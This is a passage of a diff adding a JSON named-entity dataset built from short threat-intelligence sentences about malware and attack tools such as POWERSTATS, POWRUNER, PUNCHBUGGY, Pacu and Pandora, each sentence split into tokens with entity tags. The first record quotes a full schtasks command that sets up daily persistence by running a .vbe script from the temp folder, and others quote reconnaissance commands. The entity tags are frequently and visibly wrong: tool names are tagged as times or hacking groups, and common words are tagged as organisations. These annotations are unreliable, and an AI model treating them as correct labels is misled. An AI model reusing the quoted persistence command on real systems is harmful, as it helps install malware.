+ "POWERSTATS", + "has", + "established", + "persistence", + "through", + "a", + "scheduled", + "task", + "using", + "the", + "command", + "<code>”C:\\Windows\\system32\\schtasks.exe”", + "/Create", + "/F", + "/SC", + "DAILY", + "/ST", + "12:00", + "/TN", + "MicrosoftEdge", + "/TR", + "“c:\\Windows\\system32\\wscript.exe", + "C:\\Windows\\temp\\Windows.vbe”</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "sleep", + "for", + "a", + "given", + "number", + "of", + "seconds." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "retrieve", + "screenshots", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "has", + "detected", + "security", + "tools." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "encoded", + "C2", + "traffic", + "with", + "base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "retrieve", + "OS", + "name/architecture", + "and", + "computer/domain", + "name", + "information", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "retrieve", + "IP,", + "network", + "adapter", + "configuration", + "information,", + "and", + "domain", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "has", + "the", + "ability", + "to", + "identify", + "the", + "username", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "use", + "VBScript", + "(VBE)", + "code", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "use", + "WMI", + "queries", + "to", + "retrieve", + "data", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERTON", + "is", + "written", + "in", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERTON", + "can", + "install", + "a", + "Registry", + "Run", + "key", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERTON", + "has", + "the", + "ability", + "to", + "dump", + "password", + "hashes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "POWERTON", + "has", + "used", + "AES", + "for", + "encrypting", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERTON", + "has", + "used", + "HTTP/HTTPS", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERTON", + "can", + "use", + "WMI", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "can", + "use", + "DNS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "user", + "account", + "information", + "by", + "running", + "<code>net", + "user", + "/domain</code>", + "or", + "a", + "series", + "of", + "other", + "commands", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "domain", + "group", + "information", + "by", + "running", + "<code>net", + "group", + "/domain</code>", + "or", + "a", + "series", + "of", + "other", + "commands", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "enumerate", + "user", + "directories", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "can", + "download", + "or", + "upload", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "local", + "group", + "information", + "by", + "running", + "<code>net", + "localgroup", + "administrators</code>", + "or", + "a", + "series", + "of", + "other", + "commands", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "is", + "written", + "in", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "process", + "information", + "by", + "running", + "<code>tasklist</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "query", + "the", + "Registry", + "by", + "running", + "<code>reg", + "query</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "persists", + "through", + "a", + "scheduled", + "task", + "that", + "executes", + "it", + "every", + "minute." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "can", + "capture", + "a", + "screenshot", + "from", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "information", + "on", + "the", + "victim's", + "anti-virus", + "software." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "can", + "use", + "base64", + "encoded", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "information", + "about", + "the", + "system", + "by", + "running", + "<code>hostname</code>", + "and", + "<code>systeminfo</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "network", + "configuration", + "data", + "by", + "running", + "<code>ipconfig", + "/all</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "active", + "network", + "connections", + "by", + "running", + "<code>netstat", + "-an</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "collect", + "information", + "about", + "the", + "currently", + "logged", + "in", + "user", + "by", + "running", + "<code>whoami</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "can", + "use", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "can", + "execute", + "commands", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWRUNER", + "may", + "use", + "WMI", + "when", + "collecting", + "information", + "about", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PS1", + "can", + "use", + "an", + "XOR", + "key", + "to", + "decrypt", + "a", + "PowerShell", + "loader", + "and", + "payload", + "binary." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PS1", + "can", + "inject", + "its", + "payload", + "DLL", + "Into", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PS1", + "is", + "distributed", + "as", + "a", + "set", + "of", + "encrypted", + "files", + "and", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CostaBricks", + "can", + "download", + "additional", + "payloads", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PS1", + "can", + "utilize", + "a", + "PowerShell", + "loader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "PULSECHECK", + "can", + "base-64", + "encode", + "encrypted", + "data", + "sent", + "through", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PULSECHECK", + "can", + "use", + "Unix", + "shell", + "script", + "for", + "command", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PULSECHECK", + "can", + "check", + "HTTP", + "request", + "headers", + "for", + "a", + "specific", + "backdoor", + "key", + "and", + "if", + "found", + "will", + "output", + "the", + "result", + "of", + "the", + "command", + "in", + "the", + "variable", + "`HTTP_X_CMD.`" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "PULSECHECK", + "is", + "a", + "web", + "shell", + "that", + "can", + "enable", + "command", + "execution", + "on", + "compromised", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "can", + "establish", + "using", + "a", + "AppCertDLLs", + "Registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "has", + "Gzipped", + "information", + "and", + "saved", + "it", + "to", + "a", + "random", + "temp", + "file", + "before", + "exfil." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "has", + "used", + "PowerShell", + "to", + "decode", + "base64-encoded", + "assembly." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "can", + "delete", + "files", + "written", + "to", + "disk." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "can", + "download", + "additional", + "files", + "and", + "payloads", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "can", + "gather", + "user", + "names." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "has", + "saved", + "information", + "to", + "a", + "random", + "temp", + "file", + "before", + "exfil." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "mimics", + "filenames", + "from", + "%SYSTEM%\\System32", + "to", + "hide", + "DLLs", + "in", + "%WINDIR%", + "and/or", + "%TEMP%." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "has", + "hashed", + "most", + "its", + "code's", + "functions", + "and", + "encrypted", + "payloads", + "with", + "base64", + "and", + "XOR." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "has", + "used", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "has", + "used", + "python", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "has", + "been", + "observed", + "using", + "a", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "can", + "load", + "a", + "DLL", + "using", + "Rundll32." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "can", + "gather", + "AVs", + "registered", + "in", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "can", + "load", + "a", + "DLL", + "using", + "the", + "LoadLibrary", + "API." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "can", + "gather", + "system", + "information", + "such", + "as", + "computer", + "names." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHBUGGY", + "enables", + "remote", + "interaction", + "and", + "can", + "obtain", + "additional", + "code", + "over", + "HTTPS", + "GET", + "and", + "POST", + "requests." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHTRACK", + "scrapes", + "memory", + "for", + "properly", + "formatted", + "payment", + "card", + "data." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PUNCHTRACK", + "aggregates", + "collected", + "data", + "in", + "a", + "tmp", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "PUNCHTRACK", + "is", + "loaded", + "and", + "executed", + "by", + "a", + "highly", + "obfuscated", + "launcher." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "generate", + "SSH", + "and", + "API", + "keys", + "for", + "AWS", + "infrastructure", + "and", + "additional", + "API", + "keys", + "for", + "other", + "IAM", + "users." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "automatically", + "collect", + "data,", + "such", + "as", + "CloudFormation", + "templates,", + "EC2", + "user", + "data,", + "AWS", + "Inspector", + "reports,", + "and", + "IAM", + "credential", + "reports." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "leverages", + "the", + "AWS", + "CLI", + "for", + "its", + "operations." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "enumerate", + "IAM", + "users,", + "roles,", + "and", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "leverages", + "valid", + "cloud", + "accounts", + "to", + "perform", + "most", + "of", + "its", + "operations." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "run", + "commands", + "on", + "EC2", + "instances", + "using", + "AWS", + "Systems", + "Manager", + "Run", + "Command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "enumerate", + "IAM", + "permissions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "enumerate", + "AWS", + "infrastructure,", + "such", + "as", + "EC2", + "instances." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "retrieve", + "secrets", + "from", + "the", + "AWS", + "Secrets", + "Manager", + "via", + "the", + "enum_secrets", + "module." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "enumerate", + "AWS", + "services,", + "such", + "as", + "CloudTrail", + "and", + "CloudWatch." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "enumerate", + "AWS", + "storage", + "services,", + "such", + "as", + "S3", + "buckets", + "and", + "Elastic", + "Block", + "Store", + "volumes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "create", + "snapshots", + "of", + "EBS", + "volumes", + "and", + "RDS", + "instances." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "enumerate", + "and", + "download", + "files", + "stored", + "in", + "AWS", + "storage", + "services,", + "such", + "as", + "S3", + "buckets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "allowlist", + "IP", + "addresses", + "in", + "AWS", + "GuardDuty." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "disable", + "or", + "otherwise", + "restrict", + "various", + "AWS", + "logging", + "services,", + "such", + "as", + "AWS", + "CloudTrail", + "and", + "VPC", + "flow", + "logs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "set", + "up", + "S3", + "bucket", + "notifications", + "to", + "trigger", + "a", + "malicious", + "Lambda", + "function", + "when", + "a", + "CloudFormation", + "template", + "is", + "uploaded", + "to", + "the", + "bucket.", + "It", + "can", + "also", + "create", + "Lambda", + "functions", + "that", + "trigger", + "upon", + "the", + "creation", + "of", + "users,", + "roles,", + "and", + "groups." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "collect", + "CloudTrail", + "event", + "histories", + "and", + "CloudWatch", + "logs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "enumerate", + "AWS", + "security", + "services,", + "including", + "WAF", + "rules", + "and", + "GuardDuty", + "detectors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "create", + "malicious", + "Lambda", + "functions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Once", + "inside", + "a", + "Virtual", + "Private", + "Cloud,", + "Pacu", + "can", + "attempt", + "to", + "identify", + "DirectConnect,", + "VPN,", + "or", + "VPC", + "Peering." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Pacu", + "can", + "search", + "for", + "sensitive", + "data:", + "for", + "example,", + "in", + "Code", + "Build", + "environment", + "variables,", + "EC2", + "user", + "data,", + "and", + "Cloud", + "Formation", + "templates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "use", + "CVE-2017-15303", + "to", + "disable", + "Windows", + "Driver", + "Signature", + "Enforcement", + "(DSE)", + "protection", + "and", + "load", + "its", + "driver." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "use", + "DLL", + "side-loading", + "to", + "execute", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "use", + "CVE-2017-15303", + "to", + "bypass", + "Windows", + "Driver", + "Signature", + "Enforcement", + "(DSE)", + "protection", + "and", + "load", + "its", + "driver." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "load", + "additional", + "drivers", + "and", + "files", + "onto", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "write", + "an", + "encrypted", + "token", + "to", + "the", + "Registry", + "to", + "enable", + "processing", + "of", + "remote", + "commands." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "has", + "the", + "ability", + "to", + "compress", + "stings", + "with", + "QuickLZ." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "monitor", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "start", + "and", + "inject", + "code", + "into", + "a", + "new", + "`svchost`", + "process." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "has", + "the", + "ability", + "to", + "install", + "itself", + "as", + "a", + "Windows", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "has", + "the", + "ability", + "to", + "encrypt", + "communications", + "with", + "D3DES." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "identify", + "if", + "incoming", + "HTTP", + "traffic", + "contains", + "a", + "token", + "and", + "if", + "so", + "it", + "will", + "intercept", + "the", + "traffic", + "and", + "process", + "the", + "received", + "command." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pandora", + "can", + "communicate", + "over", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pandora", + "has", + "the", + "ability", + "to", + "gain", + "system", + "privileges", + "through", + "Windows", + "services." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Features", + "I-Purp", + "I-Purp", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Pasam", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "files." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pasam", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "delete", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Pasam", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "lists", + "of", + "files." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pasam", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "upload", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Pasam", + "establishes", + "by", + "infecting", + "the", + "Security", + "Accounts", + "Manager", + "(SAM)", + "DLL", + "to", + "load", + "a", + "malicious", + "DLL", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + 